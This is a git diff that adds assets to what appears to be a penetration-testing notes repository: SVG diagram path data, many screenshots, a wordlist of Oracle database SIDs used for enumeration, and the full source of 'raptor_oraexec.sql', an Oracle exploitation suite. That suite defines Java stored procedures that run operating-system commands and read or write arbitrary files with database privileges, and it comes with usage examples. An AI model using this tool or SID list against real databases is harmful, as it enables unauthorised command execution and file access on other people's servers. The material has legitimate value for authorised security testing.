L245.930938,41.9921875 L249.712188,41.9921875 L249.712188,42.8515625 L245.930938,42.8515625 Z M251.315625,47 L255.854688,35.375 L256.815625,35.375 L261.190625,47 L260.159375,47 L258.675,43.0546875 L253.854688,43.0546875 L252.307813,47 L251.315625,47 Z M254.2375,42.3203125 L258.315625,42.3203125 C257.143744,38.9557123 256.479689,36.9765655 256.323438,36.3828125 C256.260937,36.6119803 256.05521,37.2213492 255.70625,38.2109375 C255.35729,39.2005258 255.02396,40.1328081 254.70625,41.0078125 L254.2375,42.3203125 Z M265.372188,47.1796875 C264.653434,47.1796875 264.127398,47.0169287 263.794063,46.6914062 C263.460728,46.3658838 263.294063,45.8359412 263.294063,45.1015625 L263.294063,35.109375 L264.247188,35.03125 L264.247188,45.046875 C264.247188,45.5677109 264.342239,45.9270823 264.532344,46.125 C264.722449,46.3229177 265.010207,46.421875 265.395625,46.421875 C265.708127,46.421875 266.098748,46.3619798 266.5675,46.2421875 L266.606563,46.9921875 C266.096144,47.1171881 265.684689,47.1796875 265.372188,47.1796875 Z M270.74125,47.1796875 C270.022497,47.1796875 269.49646,47.0169287 269.163125,46.6914062 C268.82979,46.3658838 268.663125,45.8359412 268.663125,45.1015625 L268.663125,35.109375 L269.61625,35.03125 L269.61625,45.046875 C269.61625,45.5677109 269.711301,45.9270823 269.901406,46.125 C270.091512,46.3229177 270.379269,46.421875 270.764688,46.421875 C271.077189,46.421875 271.46781,46.3619798 271.936563,46.2421875 L271.975625,46.9921875 C271.465206,47.1171881 271.053752,47.1796875 270.74125,47.1796875 Z M277.500938,46.4140625 C278.125941,46.4140625 278.653279,46.2486996 279.082969,45.9179688 C279.512659,45.5872379 279.825155,45.1510444 280.020469,44.609375 C280.215782,44.0677056 280.313438,43.445316 280.313438,42.7421875 C280.313438,41.6380153 280.079065,40.7500034 279.610313,40.078125 C279.14156,39.4062466 278.428026,39.0703125 277.469688,39.0703125 C276.844685,39.0703125 276.312138,39.2382796 275.872031,39.5742188 C275.431925,39.9101579 275.110314,40.3502577 274.907188,40.8945312 C274.704062,41.4388048 274.6025,42.0624965 274.6025,42.765625 C274.6025,43.8333387 274.851196,44.7083299 275.348594,45.390625 C275.845992,46.0729201 276.563433,46.4140625 277.500938,46.4140625 Z M277.430625,47.1875 C276.65458,47.1875 275.970993,46.9921895 275.379844,46.6015625 C274.788695,46.2109355 274.338179,45.6809929 274.028281,45.0117188 C273.718384,44.3424446 273.563438,43.5859417 273.563438,42.7421875 C273.563438,42.1067677 273.653281,41.5169298 273.832969,40.9726562 C274.012657,40.4283827 274.269165,39.9570332 274.6025,39.5585938 C274.935835,39.1601543 275.349894,38.8476574 275.844688,38.6210938 C276.339482,38.3945301 276.888956,38.28125 277.493125,38.28125 C278.295213,38.28125 278.990518,38.4778626 279.579063,38.8710938 C280.167607,39.2643249 280.609009,39.7929654 280.903281,40.4570312 C281.197554,41.1210971 281.344688,41.8775999 281.344688,42.7265625 C281.344688,43.5807334 281.193648,44.3411425 280.891563,45.0078125 C280.589478,45.6744825 280.138962,46.2044251 279.54,46.5976562 C278.941039,46.9908874 278.237921,47.1875 277.430625,47.1875 Z M285.377813,47 L282.987188,38.4375 L284.002813,38.4375 L285.979375,46.0859375 C287.401257,41.512998 288.19552,38.9635443 288.362188,38.4375 L289.549688,38.4375 C291.106987,43.5208588 291.893438,46.0625 291.909063,46.0625 L293.799688,38.4375 L294.8075,38.4375 L292.455938,47 L291.330938,47 C291.315313,47.0052084 290.948129,45.8046995 290.229375,43.3984375 C289.510622,40.9921755 289.093959,39.5781271 288.979375,39.15625 C288.916875,39.4375014 288.679898,40.2304622 288.268438,41.5351562 C287.856977,42.8398503 287.461148,44.0781191 287.080938,45.25 C286.700727,46.4218809 286.508021,47.0052084 286.502813,47 L285.377813,47 Z M296.535938,42.8515625 L296.535938,41.9921875 L300.317188,41.9921875 L300.317188,42.8515625 L296.535938,42.8515625 Z M308.240938,46.359375 C309.199276,46.359375 310.005257,46.1406272 310.658906,45.703125 C311.312556,45.2656228 311.791717,44.6653684 312.096406,43.9023438 C312.401095,43.1393191 312.553438,42.2317761 312.553438,41.1796875 C312.553438,39.5338459 312.188858,38.2604212 311.459688,37.359375 C310.730517,36.4583288 309.660216,36.0078125 308.24875,36.0078125 C306.826868,36.0078125 305.744848,36.4570268 305.002656,37.3554688 C304.260465,38.2539107 303.889375,39.5286376 303.889375,41.1796875 C303.889375,42.7786538 304.257861,44.041662 304.994844,44.96875 C305.731827,45.895838 306.813847,46.359375 308.240938,46.359375 Z M308.240938,47.1796875 C307.355517,47.1796875 306.56516,47.0325536 305.869844,46.7382812 C305.174528,46.4440089 304.604221,46.0299506 304.158906,45.4960938 C303.713592,44.9622369 303.375053,44.3307328 303.143281,43.6015625 C302.911509,42.8723922 302.795625,42.0677127 302.795625,41.1875 C302.795625,39.3437408 303.270881,37.8802137 304.221406,36.796875 C305.171932,35.7135363 306.514366,35.171875 308.24875,35.171875 C309.951884,35.171875 311.279995,35.7174425 312.233125,36.8085938 C313.186255,37.899745 313.662813,39.36197 313.662813,41.1953125 C313.662813,42.0546918 313.545626,42.8476526 313.31125,43.5742188 C313.076874,44.3007849 312.737034,44.932289 312.291719,45.46875 C311.846404,46.005211 311.277399,46.4244777 310.584688,46.7265625 C309.891976,47.0286473 309.110734,47.1796875 308.240938,47.1796875 Z M316.57875,47 C316.568333,41.9739332 316.563125,39.1197951 316.563125,38.4375 L317.36,38.4375 L317.4225,40.125 C317.729793,39.6145808 318.120414,39.1979183 318.594375,38.875 C319.068336,38.5520817 319.563123,38.390625 320.07875,38.390625 C320.292293,38.390625 320.521457,38.408854 320.76625,38.4453125 L320.695938,39.25 C320.508437,39.2187498 320.310522,39.203125 320.102188,39.203125 C319.378226,39.203125 318.770159,39.4882784 318.277969,40.0585938 C317.785779,40.6289091 317.539688,41.3046836 317.539688,42.0859375 L317.539688,47 L316.57875,47 Z M323.080625,47 L323.080625,38.4375 L324.057188,38.4375 L324.057188,47 L323.080625,47 Z M323.080625,36.6875 L323.080625,35.375 L324.049375,35.375 L324.049375,36.6875 L323.080625,36.6875 Z M328.605938,50.9765625 L328.48875,50.109375 L330.30125,50.109375 C330.702294,50.109375 331.056457,50.0742191 331.36375,50.0039062 C331.671043,49.9335934 331.930155,49.8424485 332.141094,49.7304688 C332.352032,49.618489 332.531718,49.4622406 332.680156,49.2617188 C332.828595,49.0611969 332.944479,48.8619802 333.027813,48.6640625 C333.111146,48.4661448 333.174948,48.209637 333.219219,47.8945312 C333.26349,47.5794255 333.290833,47.2903659 333.30125,47.0273438 C333.311667,46.7643216 333.316875,46.4322937 333.316875,46.03125 C333.316875,46.088542 333.311667,46.0755213 333.30125,45.9921875 L333.262188,45.453125 C332.934061,45.9479191 332.546044,46.3294257 332.098125,46.5976562 C331.650206,46.8658868 331.103337,47 330.4575,47 C329.947081,47 329.482242,46.9088551 329.062969,46.7265625 C328.643696,46.5442699 328.299949,46.3072931 328.031719,46.015625 C327.763488,45.7239569 327.53823,45.3906269 327.355938,45.015625 C327.173645,44.6406231 327.043438,44.2669289 326.965313,43.8945312 C326.887187,43.5221336 326.848125,43.1536477 326.848125,42.7890625 C326.848125,42.3307269 326.885885,41.8945333 326.961406,41.4804688 C327.036928,41.0664042 327.168437,40.6614603 327.355938,40.265625 C327.543439,39.8697897 327.777811,39.5273452 328.059063,39.2382812 C328.340314,38.9492173 328.70229,38.7174488 329.145,38.5429688 C329.587711,38.3684887 330.087706,38.28125 330.645,38.28125 C331.191878,38.28125 331.674946,38.3893218 332.094219,38.6054688 C332.513492,38.8216157 332.902811,39.1666643 333.262188,39.640625 L333.355938,38.4375 L334.215313,38.4375 L334.215313,46.375 C334.215313,46.7187517 334.211406,46.9960927 334.203594,47.2070312 C334.195781,47.4179698 334.164532,47.7044253 334.109844,48.0664062 C334.055156,48.4283872 333.979636,48.7252593 333.883281,48.9570312 C333.786927,49.1888032 333.639793,49.4453111 333.441875,49.7265625 C333.243957,50.0078139 333.005679,50.2291659 332.727031,50.390625 C332.448384,50.5520841 332.091617,50.6901036 331.656719,50.8046875 C331.221821,50.9192714 330.728336,50.9765625 330.17625,50.9765625 L328.605938,50.9765625 Z M330.5825,46.2109375 C330.96271,46.2109375 331.306457,46.1497402 331.61375,46.0273438 C331.921043,45.9049473 332.174947,45.7434906 332.375469,45.5429688 C332.575991,45.3424469 332.74526,45.1067722 332.883281,44.8359375 C333.021303,44.5651028 333.118958,44.2851577 333.17625,43.9960938 C333.233542,43.7070298 333.262188,43.4088557 333.262188,43.1015625 L333.262188,42.2109375 C333.262188,41.8046855 333.212709,41.4218768 333.11375,41.0625 C333.014791,40.7031232 332.862449,40.3710953 332.656719,40.0664062 C332.450989,39.7617172 332.168439,39.5208342 331.809063,39.34375 C331.449686,39.1666658 331.033023,39.078125 330.559063,39.078125 C330.173644,39.078125 329.825991,39.152343 329.516094,39.3007812 C329.206196,39.4492195 328.952293,39.6458321 328.754375,39.890625 C328.556457,40.1354179 328.389792,40.4218734 328.254375,40.75 C328.118958,41.0781266 328.023907,41.4127587 327.969219,41.7539062 C327.914531,42.0950538 327.887188,42.4453107 327.887188,42.8046875 C327.887188,43.1223974 327.911927,43.4309881 327.961406,43.7304688 C328.010886,44.0299494 328.099427,44.3333318 328.227031,44.640625 C328.354636,44.9479182 328.517395,45.2148426 328.715313,45.4414062 C328.91323,45.6679699 329.172342,45.8528639 329.492656,45.9960938 C329.81297,46.1393236 330.176248,46.2109375 330.5825,46.2109375 Z M337.38125,47 L337.38125,38.4375 L338.357813,38.4375 L338.357813,47 L337.38125,47 Z M337.38125,36.6875 L337.38125,35.375 L338.35,35.375 L338.35,36.6875 L337.38125,36.6875 Z M341.58625,47 L341.58625,38.4375 L342.43,38.4375 L342.562813,39.7578125 C342.870106,39.2994769 343.282862,38.9388034 343.801094,38.6757812 C344.319326,38.4127591 344.877914,38.28125 345.476875,38.28125 C346.461255,38.28125 347.185206,38.5520806 347.64875,39.09375 C348.112294,39.6354194 348.344063,40.4999941 348.344063,41.6875 L348.344063,47 L347.3675,47 L347.3675,41.25 C347.341458,40.4895795 347.180002,39.94271 346.883125,39.609375 C346.586249,39.27604 346.099274,39.109375 345.422188,39.109375 C344.646142,39.109375 344.012034,39.3046855 343.519844,39.6953125 C343.027654,40.0859395 342.719063,40.5911427 342.594063,41.2109375 C342.573229,41.4557304 342.562813,41.7109362 342.562813,41.9765625 L342.562813,47 L341.58625,47 Z M351.5725,47.2890625 L351.5725,45.640625 L352.970938,45.640625 L352.970938,47.2890625 L351.5725,47.2890625 Z M351.5725,39.7578125 L351.5725,38.125 L352.970938,38.125 L352.970938,39.7578125 L351.5725,39.7578125 Z M362.279375,42.5234375 L361.2325,41.8828125 L363.185625,39.1484375 L360.302813,38.46875 L360.646563,37.3125 L363.4825,38.5859375 L363.185625,35.171875 L364.490313,35.171875 L364.20125,38.5859375 L367.045,37.3125 L367.396563,38.4609375 L364.474688,39.1484375 C364.573646,39.2994799 364.848383,39.67057 365.298906,40.2617188 C365.749429,40.8528675 366.138748,41.3932267 366.466875,41.8828125 C366.284582,42.0130215 366.110105,42.1197912 365.943438,42.203125 C365.77677,42.2864588 365.607501,42.3906244 365.435625,42.515625 L363.810625,39.4921875 L362.279375,42.5234375 Z" id="Access-Control-Allow-Copy"></path>
+            </g>
+            <path d="M1002.36156,80.2246094 C1001.13109,80.2246094 1000.04386,80.0944023 999.099844,79.8339844 C998.155829,79.5735664 997.423414,79.2871109 996.902578,78.9746094 L997.371328,78.0859375 C998.745033,78.8281287 1000.44423,79.1992188 1002.46898,79.1992188 C1003.58227,79.1992188 1004.44001,78.9095081 1005.04223,78.3300781 C1005.64444,77.7506481 1005.94555,76.933599 1005.94555,75.8789062 C1005.94555,75.4882793 1005.90974,75.1595065 1005.83813,74.8925781 C1005.76651,74.6256497 1005.63305,74.3701184 1005.43773,74.1259766 C1005.24242,73.8818347 1004.95759,73.6767586 1004.58324,73.5107422 C1004.20889,73.3447257 1003.73201,73.2031256 1003.15258,73.0859375 L1000.80883,72.6171875 C999.500228,72.3567695 998.518792,71.9466174 997.864492,71.3867188 C997.210192,70.8268201 996.883047,70.0293021 996.883047,68.9941406 C996.883047,68.3235644 997.013254,67.7425155 997.273672,67.2509766 C997.53409,66.7594376 997.910063,66.367189 998.401602,66.0742188 C998.893141,65.7812485 999.462796,65.5647793 1000.11059,65.4248047 C1000.75838,65.28483 1001.49567,65.2148438 1002.3225,65.2148438 C1003.14282,65.2148438 1003.94522,65.3157542 1004.72973,65.5175781 C1005.51424,65.7194021 1006.15713,65.9472644 1006.65844,66.2011719 L1006.33617,67.1582031 C1005.95206,66.9433583 1005.38403,66.7399098 1004.63207,66.5478516 C1003.88011,66.3557933 1003.1005,66.2597656 1002.2932,66.2597656 C1000.9195,66.2597656 999.887608,66.4892555 999.1975,66.9482422 C998.507392,67.4072289 998.162344,68.1315055 998.162344,69.1210938 C998.162344,69.7395864 998.380441,70.2360007 998.816641,70.6103516 C999.252841,70.9847024 999.897366,71.2630199 1000.75023,71.4453125 L1003.36742,71.9824219 C1004.01847,72.1191413 1004.57022,72.2819001 1005.0227,72.4707031 C1005.47517,72.6595062 1005.87556,72.9036443 1006.22387,73.203125 C1006.57218,73.5026057 1006.83096,73.8753233 1007.00023,74.3212891 C1007.16951,74.7672548 1007.25414,75.2962209 1007.25414,75.9082031 C1007.25414,77.2753975 1006.80655,78.3365848 1005.91137,79.0917969 C1005.01618,79.847009 1003.83292,80.2246094 1002.36156,80.2246094 Z M1014.715,80.234375 C1013.23713,80.234375 1012.06364,79.7395883 1011.19449,78.75 C1010.32535,77.7604117 1009.89078,76.4192793 1009.89078,74.7265625 C1009.89078,73.0924397 1010.31558,71.7545625 1011.1652,70.7128906 C1012.01481,69.6712188 1013.11343,69.1341147 1014.46109,69.1015625 C1015.71761,69.1015625 1016.72671,69.5507768 1017.48844,70.4492188 C1018.25016,71.3476607 1018.63102,72.5520758 1018.63102,74.0625 C1018.63102,74.121094 1018.62939,74.239908 1018.62613,74.4189453 C1018.62288,74.5979827 1018.62125,74.7233069 1018.62125,74.7949219 L1011.17008,74.7949219 C1011.1831,76.1686267 1011.51513,77.257483 1012.16617,78.0615234 C1012.81722,78.8655639 1013.67658,79.2675781 1014.7443,79.2675781 C1015.44091,79.2675781 1016.04638,79.1861987 1016.5607,79.0234375 C1017.07503,78.8606763 1017.61213,78.6295588 1018.17203,78.3300781 L1018.37711,79.2382812 C1017.29637,79.9023471 1016.07568,80.234375 1014.715,80.234375 Z M1011.21891,73.8183594 L1017.31266,73.8183594 C1017.31266,72.6269472 1017.0555,71.7138704 1016.54117,71.0791016 C1016.02685,70.4443328 1015.32047,70.1269531 1014.42203,70.1269531 C1013.51057,70.1269531 1012.7749,70.4654914 1012.215,71.1425781 C1011.6551,71.8196648 1011.32307,72.711583 1011.21891,73.8183594 Z M1021.90242,80 C1021.8894,73.7174165 1021.88289,70.1497438 1021.88289,69.296875 L1022.87898,69.296875 L1022.95711,71.40625 C1023.34123,70.768226 1023.8295,70.2473979 1024.42195,69.84375 C1025.0144,69.4401021 1025.63289,69.2382812 1026.27742,69.2382812 C1026.54435,69.2382812 1026.83081,69.2610675 1027.1368,69.3066406 L1027.04891,70.3125 C1026.81453,70.2734373 1026.56714,70.2539062 1026.30672,70.2539062 C1025.40177,70.2539062 1024.64168,70.610348 1024.02645,71.3232422 C1023.41121,72.0361364 1023.10359,72.8808545 1023.10359,73.8574219 L1023.10359,80 L1021.90242,80 Z M1032.35156,80 L1028.26953,69.296875 L1029.56836,69.296875 L1032.04883,76.0449219 C1032.17904,76.4681011 1032.33366,76.9189429 1032.5127,77.3974609 C1032.69173,77.875979 1032.83659,78.2486966 1032.94727,78.515625 L1033.11328,78.9160156 C1033.23698,78.4993469 1033.39811,78.0517602 1033.59668,77.5732422 C1033.79525,77.0947242 1033.97591,76.5950547 1034.13867,76.0742188 C1034.31445,75.5143201 1034.63346,74.669602 1035.0957,73.5400391 C1035.55795,72.4104761 1036.0625,70.9961022 1036.60938,69.296875 L1037.9082,69.296875 L1033.75781,80 L1032.35156,80 Z M1044.51945,80.234375 C1043.04158,80.234375 1041.86809,79.7395883 1040.99895,78.75 C1040.1298,77.7604117 1039.69523,76.4192793 1039.69523,74.7265625 C1039.69523,73.0924397 1040.12003,71.7545625 1040.96965,70.7128906 C1041.81926,69.6712188 1042.91788,69.1341147 1044.26555,69.1015625 C1045.52206,69.1015625 1046.53117,69.5507768 1047.29289,70.4492188 C1048.05461,71.3476607 1048.43547,72.5520758 1048.43547,74.0625 C1048.43547,74.121094 1048.43384,74.239908 1048.43059,74.4189453 C1048.42733,74.5979827 1048.4257,74.7233069 1048.4257,74.7949219 L1040.97453,74.7949219 C1040.98755,76.1686267 1041.31958,77.257483 1041.97062,78.0615234 C1042.62167,78.8655639 1043.48104,79.2675781 1044.54875,79.2675781 C1045.24537,79.2675781 1045.85083,79.1861987 1046.36516,79.0234375 C1046.87948,78.8606763 1047.41659,78.6295588 1047.97648,78.3300781 L1048.18156,79.2382812 C1047.10083,79.9023471 1045.88014,80.234375 1044.51945,80.234375 Z M1041.02336,73.8183594 L1047.11711,73.8183594 C1047.11711,72.6269472 1046.85995,71.7138704 1046.34562,71.0791016 C1045.8313,70.4443328 1045.12493,70.1269531 1044.22648,70.1269531 C1043.31502,70.1269531 1042.57935,70.4654914 1042.01945,71.1425781 C1041.45955,71.8196648 1041.12753,72.711583 1041.02336,73.8183594 Z M1051.70687,80 C1051.69385,73.7174165 1051.68734,70.1497438 1051.68734,69.296875 L1052.68344,69.296875 L1052.76156,71.40625 C1053.14568,70.768226 1053.63396,70.2473979 1054.22641,69.84375 C1054.81886,69.4401021 1055.43734,69.2382812 1056.08187,69.2382812 C1056.3488,69.2382812 1056.63526,69.2610675 1056.94125,69.3066406 L1056.85336,70.3125 C1056.61898,70.2734373 1056.37159,70.2539062 1056.11117,70.2539062 C1055.20622,70.2539062 1054.44614,70.610348 1053.8309,71.3232422 C1053.21566,72.0361364 1052.90805,72.8808545 1052.90805,73.8574219 L1052.90805,80 L1051.70687,80 Z" id="Server" fill="#D3DDE2"></path>
+            <polygon id="Line-3" fill="#4E768D" fill-rule="nonzero" points="206.997534 260.8 1019 260.8 1019 259.8 206.997534 259.8"></polygon>
+            <path d="M1013.09028,252.92649 C1012.79819,252.642285 1012.80234,252.181416 1013.10091,251.900531 C1013.39253,251.629186 1013.85347,251.633861 1014.13766,251.910367 L1022.85946,260.37454 C1023.15469,260.65856 1023.14947,261.123157 1022.85031,261.401438 L1013.95218,269.70019 C1013.662,269.970123 1013.20109,269.966375 1012.91712,269.690083 C1012.62352,269.404478 1012.62869,268.943585 1012.92744,268.662525 L1021.28287,260.868477 L1013.09028,252.92649 Z M1021.92283,261.092033 L1013.33764,269.100401 C1013.2882,269.146919 1013.28745,269.213273 1013.33551,269.260024 C1013.38974,269.312787 1013.48686,269.313577 1013.54323,269.26114 L1022.44137,260.962388 C1022.48918,260.917917 1022.48992,260.851605 1022.44254,260.806022 L1013.71952,252.340671 C1013.66445,252.287085 1013.56733,252.2861 1013.51083,252.338665 C1013.46227,252.384344 1013.46168,252.450705 1013.5083,252.496072 L1022.15352,260.876842 L1021.92283,261.092033 Z" id="Stroke-18-Copy-9" fill="#4E768D" fill-rule="nonzero"></path>
+            <path d="M1016.09028,566.92649 C1015.79819,566.642285 1015.80234,566.181416 1016.10091,565.900531 C1016.39253,565.629186 1016.85347,565.633861 1017.13766,565.910367 L1025.85946,574.37454 C1026.15469,574.65856 1026.14947,575.123157 1025.85031,575.401438 L1016.95218,583.70019 C1016.662,583.970123 1016.20109,583.966375 1015.91712,583.690083 C1015.62352,583.404478 1015.62869,582.943585 1015.92744,582.662525 L1024.28287,574.868477 L1016.09028,566.92649 Z M1024.92283,575.092033 L1016.33764,583.100401 C1016.2882,583.146919 1016.28745,583.213273 1016.33551,583.260024 C1016.38974,583.312787 1016.48686,583.313577 1016.54323,583.26114 L1025.44137,574.962388 C1025.48918,574.917917 1025.48992,574.851605 1025.44254,574.806022 L1016.71952,566.340671 C1016.66445,566.287085 1016.56733,566.2861 1016.51083,566.338665 C1016.46227,566.384344 1016.46168,566.450705 1016.5083,566.496072 L1025.15352,574.876842 L1024.92283,575.092033 Z" id="Stroke-18-Copy-10" fill="#4E768D" fill-rule="nonzero"></path>
+            <path d="M206.090283,725.92649 C205.798187,725.642285 205.802336,725.181416 206.100906,724.900531 C206.392533,724.629186 206.853474,724.633861 207.137657,724.910367 L215.859462,733.37454 C216.154686,733.65856 216.149469,734.123157 215.850313,734.401438 L206.952177,742.70019 C206.661995,742.970123 206.201088,742.966375 205.917125,742.690083 C205.623516,742.404478 205.628692,741.943585 205.927444,741.662525 L214.282874,733.868477 L206.090283,725.92649 Z M214.922833,734.092033 L206.337643,742.100401 C206.288198,742.146919 206.287453,742.213273 206.335514,742.260024 C206.389742,742.312787 206.486862,742.313577 206.543233,742.26114 L215.441369,733.962388 C215.489176,733.917917 215.489921,733.851605 215.442543,733.806022 L206.719521,725.340671 C206.664448,725.287085 206.567328,725.2861 206.510828,725.338665 C206.462274,725.384344 206.461676,725.450705 206.508303,725.496072 L215.153523,733.876842 L214.922833,734.092033 Z" id="Stroke-18-Copy-9" fill="#4E768D" fill-rule="nonzero" transform="translate(210.888962, 733.799986) scale(-1, -1) translate(-210.888962, -733.799986) "></path>
+            <path d="M208.090283,409.92649 C207.798187,409.642285 207.802336,409.181416 208.100906,408.900531 C208.392533,408.629186 208.853474,408.633861 209.137657,408.910367 L217.859462,417.37454 C218.154686,417.65856 218.149469,418.123157 217.850313,418.401438 L208.952177,426.70019 C208.661995,426.970123 208.201088,426.966375 207.917125,426.690083 C207.623516,426.404478 207.628692,425.943585 207.927444,425.662525 L216.282874,417.868477 L208.090283,409.92649 Z M216.922833,418.092033 L208.337643,426.100401 C208.288198,426.146919 208.287453,426.213273 208.335514,426.260024 C208.389742,426.312787 208.486862,426.313577 208.543233,426.26114 L217.441369,417.962388 C217.489176,417.917917 217.489921,417.851605 217.442543,417.806022 L208.719521,409.340671 C208.664448,409.287085 208.567328,409.2861 208.510828,409.338665 C208.462274,409.384344 208.461676,409.450705 208.508303,409.496072 L217.153523,417.876842 L216.922833,418.092033 Z" id="Stroke-18-Copy-9" fill="#4E768D" fill-rule="nonzero" transform="translate(212.888962, 417.799986) scale(-1, -1) translate(-212.888962, -417.799986) "></path>
+            <polygon id="Line-3" fill="#4E768D" fill-rule="nonzero" points="209.997534 418.6 1022 418.6 1022 417.6 209.997534 417.6"></polygon>
+            <polygon id="Line-3" fill="#4E768D" fill-rule="nonzero" points="209.997534 576.4 1022 576.4 1022 575.4 209.997534 575.4"></polygon>
+            <g id="Group-Copy-4" transform="translate(207.000000, 732.200000)" stroke="#4E768D" stroke-linecap="square">
+                <path d="M0.497533913,1.5 L811.5,1.5" id="Line-3"></path>
+            </g>
+            <polygon id="Stroke-31" fill="#52B1DB" fill-rule="nonzero" points="162.5 261.5 182 261.5 182 260.5 161.5 260.5 161.5 576.5 182 576.5 182 575.5 162.5 575.5"></polygon>
+            <polygon id="Stroke-31-Copy" fill="#52B1DB" fill-rule="nonzero" points="162.5 580.5 182 580.5 182 579.5 161.5 579.5 161.5 892.5 182 892.5 182 891.5 162.5 891.5"></polygon>
+        </g>
+    </g>
+</svg>
\ No newline at end of file
diff --git a/.gitbook/assets/ram.png b/.gitbook/assets/ram.png
new file mode 100644
index 00000000..45b944ca
Binary files /dev/null and b/.gitbook/assets/ram.png differ
diff --git a/.gitbook/assets/raptor_oraexec.sql b/.gitbook/assets/raptor_oraexec.sql
new file mode 100644
index 00000000..19e913e3
--- /dev/null
+++ b/.gitbook/assets/raptor_oraexec.sql
@@ -0,0 +1,98 @@
+--
+-- $Id: raptor_oraexec.sql,v 1.2 2006/11/23 23:40:16 raptor Exp $
+--
+-- raptor_oraexec.sql - java exploitation suite for oracle
+-- Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
+--
+-- This is an exploitation suite for Oracle written in Java. Use it to
+-- read/write files and execute OS commands with the privileges of the
+-- RDBMS, if you have the required permissions (DBA role and SYS:java).
+--
+-- "The Oracle RDBMS could almost be considered as a shell like bash or the
+-- Windows Command Prompt; it's not only capable of storing data but can also
+-- be used to completely access the file system and run operating system 
+-- commands" -- David Litchfield (http://www.databasesecurity.com/)
+--
+-- Usage example:
+-- $ sqlplus "/ as sysdba"
+-- [...]
+-- SQL> @raptor_oraexec.sql
+-- [...]
+-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa');
+-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb');
+-- SQL> exec dbms_java.set_output(2000);
+-- SQL> set serveroutput on;
+-- SQL> exec javareadfile('/tmp/mytest');
+-- /bin/ls -l > /tmp/aaa
+-- /bin/ls -l / >/tmp/bbb
+-- SQL> exec javacmd('/bin/sh /tmp/mytest');
+-- SQL> !sh
+-- $ ls -rtl /tmp/
+-- [...]
+-- -rw-r--r--   1 oracle   system        45 Nov 22 12:20 mytest
+-- -rw-r--r--   1 oracle   system      1645 Nov 22 12:20 aaa
+-- -rw-r--r--   1 oracle   system      8267 Nov 22 12:20 bbb
+-- [...]
+--
+
+create or replace and resolve java source named "oraexec" as
+import java.lang.*;
+import java.io.*;
+public class oraexec
+{
+	/*
+	 * Command execution module
+	 */
+	public static void execCommand(String command) throws IOException
+	{
+		Runtime.getRuntime().exec(command);
+	}
+
+	/*
+	 * File reading module
+	 */
+	public static void readFile(String filename) throws IOException
+	{
+		FileReader f = new FileReader(filename);
+		BufferedReader fr = new BufferedReader(f);
+		String text = fr.readLine();
+		while (text != null) {
+			System.out.println(text);
+			text = fr.readLine();
+		}
+		fr.close();
+	}
+
+	/*
+	 * File writing module
+	 */
+	public static void writeFile(String filename, String line) throws IOException
+	{
+		FileWriter f = new FileWriter(filename, true); /* append */
+		BufferedWriter fw = new BufferedWriter(f);
+		fw.write(line);
+		fw.write("\n");
+		fw.close();
+	}
+}
+/
+
+-- usage: exec javacmd('command');
+create or replace procedure javacmd(p_command varchar2) as
+language java           
+name 'oraexec.execCommand(java.lang.String)';
+/
+
+-- usage: exec dbms_java.set_output(2000);
+--        set serveroutput on;
+--        exec javareadfile('/path/to/file');
+create or replace procedure javareadfile(p_filename in varchar2) as
+language java
+name 'oraexec.readFile(java.lang.String)';
+/
+
+-- usage: exec javawritefile('/path/to/file', 'line to append');
+create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
+language java
+name 'oraexec.writeFile(java.lang.String, java.lang.String)';
+/
diff --git a/.gitbook/assets/runes.jpg b/.gitbook/assets/runes.jpg
new file mode 100644
index 00000000..d9eed9a8
Binary files /dev/null and b/.gitbook/assets/runes.jpg differ
diff --git a/.gitbook/assets/sc_create.png b/.gitbook/assets/sc_create.png
new file mode 100644
index 00000000..6fcd3048
Binary files /dev/null and b/.gitbook/assets/sc_create.png differ
diff --git a/.gitbook/assets/sc_delete.png b/.gitbook/assets/sc_delete.png
new file mode 100644
index 00000000..2fdd5b37
Binary files /dev/null and b/.gitbook/assets/sc_delete.png differ
diff --git a/.gitbook/assets/sc_psh_create.png b/.gitbook/assets/sc_psh_create.png
new file mode 100644
index 00000000..4bfb0d00
Binary files /dev/null and b/.gitbook/assets/sc_psh_create.png differ
diff --git a/.gitbook/assets/sc_psh_start.png b/.gitbook/assets/sc_psh_start.png
new file mode 100644
index 00000000..aa2b86ee
Binary files /dev/null and b/.gitbook/assets/sc_psh_start.png differ
diff --git a/.gitbook/assets/sc_start_error.png b/.gitbook/assets/sc_start_error.png
new file mode 100644
index 00000000..1dc5bed6
Binary files /dev/null and b/.gitbook/assets/sc_start_error.png differ
diff --git a/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (1).png b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (1).png
new file mode 100644
index 00000000..eb261aac
Binary files /dev/null and b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (1).png differ
diff --git a/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (2).png b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (2).png
new file mode 100644
index 00000000..e919aae5
Binary files /dev/null and b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (2).png differ
diff --git a/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (3).png b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (3).png
new file mode 100644
index 00000000..f63efe61
Binary files /dev/null and b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (3).png differ
diff --git a/.gitbook/assets/screenshot-from-2019-04-02-23-44-22.png b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22.png
new file mode 100644
index 00000000..937d40ce
Binary files /dev/null and b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22.png differ
diff --git a/.gitbook/assets/screenshot-from-2019-04-04-23-51-48.png b/.gitbook/assets/screenshot-from-2019-04-04-23-51-48.png
new file mode 100644
index 00000000..ef27f6ec
Binary files /dev/null and b/.gitbook/assets/screenshot-from-2019-04-04-23-51-48.png differ
diff --git a/.gitbook/assets/sids-oracle.txt b/.gitbook/assets/sids-oracle.txt
new file mode 100644
index 00000000..ecf01d8c
--- /dev/null
+++ b/.gitbook/assets/sids-oracle.txt
@@ -0,0 +1,737 @@
+
+ADV1
+ADVCPROD
+AIX10
+AIX11
+AIX9
+APEX
+ARIS
+ASDB
+ASDB0
+ASDB1
+ASDB2
+ASDB3
+ASDB4
+ASDB5
+ASDB6
+ASDB7
+ASDB8
+ASDB9
+ASG817
+ASG817P
+ASG817T
+ATRPROD
+ATRTEST
